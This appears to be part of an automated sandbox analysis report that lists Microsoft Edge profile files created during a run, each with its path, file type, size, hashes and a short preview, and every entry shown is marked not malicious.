                                                                                                                                                                                                                                                                                                  SHA-512:1F3E52BC47C352A18B7520A932AB7672CFC765BC253C1F4CBEDB3223970984522F6FB956CEA4F3A79ED4D44760603C2013AA243FF7B81E476F12CE3E8CC60472
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:22.576 14d0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:01:22.579 14d0 Recovering log #3.2024/12/27-01:01:22.582 14d0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\2ef67246-6962-4a3c-b885-c639827ca161.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\48513c89-b5d8-43ef-9f12-5436ca7fd290.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):144
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                                  MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                                  SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                                  SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                                  SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF48ac7.TMP (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):36864
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                                                  MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                                                  SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                                                  SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                                                  SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j..........g...}.....$.X..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\bfc3a9f9-cf38-4173-9f7d-b4ed122020c3.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\ee01ac70-cd8b-4690-b04c-b9065338d830.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):144
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.842082263530856
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqkomn1KKyRY:YHpoeS7PMVKJTnMRKXkh1KF+
                                                                                                                                                                                                                                                                                                  MD5:ABE81C38891A875B52127ACE9C314105
                                                                                                                                                                                                                                                                                                  SHA1:8EDEBDDAD493CF02D3986A664A4AD1C71CCEBB5F
                                                                                                                                                                                                                                                                                                  SHA-256:6D398F9EB5969D487B57E1C3E1EDDE58660545A7CE404F6DA40C8738B56B6177
                                                                                                                                                                                                                                                                                                  SHA-512:B90DC0E50262ECB05FE1989FA3797C51DF92C83BE94F28FE020994ED6F0E1365EB5B9A0ADA68FCFD46DADEDB6F08FA0E57FF91AA12ED88C3D9AE112FF74329F2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):80
                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.4921535629071894
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:S8ltHlS+QUl1ASEGhTFljl:S85aEFljl
                                                                                                                                                                                                                                                                                                  MD5:69449520FD9C139C534E2970342C6BD8
                                                                                                                                                                                                                                                                                                  SHA1:230FE369A09DEF748F8CC23AD70FD19ED8D1B885
                                                                                                                                                                                                                                                                                                  SHA-256:3F2E9648DFDB2DDB8E9D607E8802FEF05AFA447E17733DD3FD6D933E7CA49277
                                                                                                                                                                                                                                                                                                  SHA-512:EA34C39AEA13B281A6067DE20AD0CDA84135E70C97DB3CDD59E25E6536B19F7781E5FC0CA4A11C3618D43FC3BD3FBC120DD5C1C47821A248B8AD351F9F4E6367
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:*...#................version.1..namespace-..&f.................&f...............

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.231758134470151
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:Bcq4Iv4YebvqBZFUt8UcK/+UcxI5LYebvqBaJ:3464Yebvyg8BSLYebvL
                                                                                                                                                                                                                                                                                                  MD5:F6E8B80416976ACFDFC6D52B522435A4
                                                                                                                                                                                                                                                                                                  SHA1:6E4E1E749FC5D0FCF81367C0084CE5E9BA21524F
                                                                                                                                                                                                                                                                                                  SHA-256:353F8ECD4B5E5F2DD81647705EDEC62BBB1F65EEF463597490DD134E752C1148
                                                                                                                                                                                                                                                                                                  SHA-512:A2C91032722BD7C020ECED7278255635E35C2F7BB65B83632AF454EC4F2E55DF272FC43D3EAEF958485906607222F5A4BF6E8A2A5A4A19DB3C38A71C78FA5645
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:40.168 1158 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-01:01:40.169 1158 Recovering log #3.2024/12/27-01:01:40.172 1158 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):422
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.231758134470151
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:12:Bcq4Iv4YebvqBZFUt8UcK/+UcxI5LYebvqBaJ:3464Yebvyg8BSLYebvL
                                                                                                                                                                                                                                                                                                  MD5:F6E8B80416976ACFDFC6D52B522435A4
                                                                                                                                                                                                                                                                                                  SHA1:6E4E1E749FC5D0FCF81367C0084CE5E9BA21524F
                                                                                                                                                                                                                                                                                                  SHA-256:353F8ECD4B5E5F2DD81647705EDEC62BBB1F65EEF463597490DD134E752C1148
                                                                                                                                                                                                                                                                                                  SHA-512:A2C91032722BD7C020ECED7278255635E35C2F7BB65B83632AF454EC4F2E55DF272FC43D3EAEF958485906607222F5A4BF6E8A2A5A4A19DB3C38A71C78FA5645
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:40.168 1158 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/MANIFEST-000001.2024/12/27-01:01:40.169 1158 Recovering log #3.2024/12/27-01:01:40.172 1158 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.191959556105143
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XtHyq2P923oH+TcwtpIFUt8U4XcX1Zmw+U4XcBRkwO923oH+Tcwta/WLJ:BoHyv4YebmFUt8Ut/+U5R5LYebaUJ
                                                                                                                                                                                                                                                                                                  MD5:92452C0DDBBCEC4A7FEC5290BE055CDB
                                                                                                                                                                                                                                                                                                  SHA1:805DED956F0223D23AC47FDC2C5E7DD98B31E62E
                                                                                                                                                                                                                                                                                                  SHA-256:103CEB20ECECF149ABFFDF9D865EDB059FA7049ABED91C47B30E086D367E534B
                                                                                                                                                                                                                                                                                                  SHA-512:CF4F55C1725D7DF9A8E6E973CAA0F833E5B3DC6C0ECF77774849F6B710C09F5B84328612DF908A36427DE6173F7B488A5C58EC6B332C00F7EB80CDCEA29D204C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.492 1850 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:01:21.576 1850 Recovering log #3.2024/12/27-01:01:21.576 1850 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB\LOG.old (copy)

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):328
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.191959556105143
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:6:B4XtHyq2P923oH+TcwtpIFUt8U4XcX1Zmw+U4XcBRkwO923oH+Tcwta/WLJ:BoHyv4YebmFUt8Ut/+U5R5LYebaUJ
                                                                                                                                                                                                                                                                                                  MD5:92452C0DDBBCEC4A7FEC5290BE055CDB
                                                                                                                                                                                                                                                                                                  SHA1:805DED956F0223D23AC47FDC2C5E7DD98B31E62E
                                                                                                                                                                                                                                                                                                  SHA-256:103CEB20ECECF149ABFFDF9D865EDB059FA7049ABED91C47B30E086D367E534B
                                                                                                                                                                                                                                                                                                  SHA-512:CF4F55C1725D7DF9A8E6E973CAA0F833E5B3DC6C0ECF77774849F6B710C09F5B84328612DF908A36427DE6173F7B488A5C58EC6B332C00F7EB80CDCEA29D204C
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:2024/12/27-01:01:21.492 1850 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:01:21.576 1850 Recovering log #3.2024/12/27-01:01:21.576 1850 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.2651687888907042
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:8/2qOB1nxCkMXSAELyKOMq+8yC8F/YfU5m+OlTLVumC:Bq+n0JX9ELyKOMq+8y9/OwJ
                                                                                                                                                                                                                                                                                                  MD5:2B05CFE22E737A971DE04FE241744685
                                                                                                                                                                                                                                                                                                  SHA1:5919FD449C43D46E797597A1C44457132922CE7F
                                                                                                                                                                                                                                                                                                  SHA-256:F218242FB3AF771DDB378225CDC9C2406631CB08A1C579912ECB887045AD802D
                                                                                                                                                                                                                                                                                                  SHA-512:B7291935B265EF0E88243BA7992544BA2FF6490882F4268AB5CFB3030563C41B4E44242DB351CB957CB8E5AA85B9E7365B2F316B30B4EAD9D342B3968538361D
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 10, cookie 0x7, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):40960
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.4664027299543818
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:48:Tnj7dojKsKmjKZKAsjZNOjAhts3N8g1j3UcBBUS:v7doKsKuKZKlZNmu46yjxP
                                                                                                                                                                                                                                                                                                  MD5:4E3F1454E92EFA1C63BF8652B7855CFA
                                                                                                                                                                                                                                                                                                  SHA1:23C4311D9C5D6D3BDD56DB554FBC6E011C306FC4
                                                                                                                                                                                                                                                                                                  SHA-256:ACBC62418F7AD244B0C1B2393203796ACCAF6E01067ABA970080BB03938E5040
                                                                                                                                                                                                                                                                                                  SHA-512:C7F47BF561DA68FD3E875B2062BC32091D9D0C5D399A9CAA86882918A2B31F2BCA73F64E7AF4BC4ABBBCB474EFA543BD0BAF240DEE0F9C3E005FB39C0DF26725
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j.......w..g...........M...w..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\WebStorage\QuotaManager-journal

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):12824
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.1350540537034711
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:PQHNllv/etXlfuLrZlM1qvTv4RRfs21d7jdtQfQMcKHurZlJXtXlfuLrj:PQSlGhkpRS+dndOcSctlG7
                                                                                                                                                                                                                                                                                                  MD5:15CB3AD106C56C158A515514E3878BD9
                                                                                                                                                                                                                                                                                                  SHA1:D4C52ED26BB2FFB6F97CED29472721DFAD2D8082
                                                                                                                                                                                                                                                                                                  SHA-256:1889FC5A816EDFE9B22237F285E2C0CDF1539C8BE5A90CE75D4682D88F6F613E
                                                                                                                                                                                                                                                                                                  SHA-512:7DD5E5B3D465DDC23D1DCBE3872547E91351855EB9D7BCC526B64E5E9F779BAF8FEE4D2AE392A9F95DAE34C5B96CD1E35A4C872F4A49C7CA895EC3A99C312400
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\a93cc9f2-f143-4634-8de4-bab81f14b53f.tmp

                                                                                                                                                                                                                                                                                                  Download File
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):38627
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.55456231766999
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:h4FoOV7pLGLhOwWPEmfRH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVq80UErwrSj4qK6:h4FoOjchOwWPEmfRHu1jaXXUdrSjRJt3
                                                                                                                                                                                                                                                                                                  MD5:456FEA2FC7776D8584A604B3D0A37931
                                                                                                                                                                                                                                                                                                  SHA1:DE588B7BB67F75EBB42E652D3F1D4AD3C922D3D3
                                                                                                                                                                                                                                                                                                  SHA-256:A642E4DD886BC250F15AD619AA7878A2F8B5CDB553B32C2F5DFA67D62ED3C152
                                                                                                                                                                                                                                                                                                  SHA-512:AE2441855CCE8C75187F91BD06EA4C3279B32680C07426BA61C214D0405F3783FC249F7A3084290D70C3B8002E6889A8D59B05920B6DA9F06A2C1576281F65A2
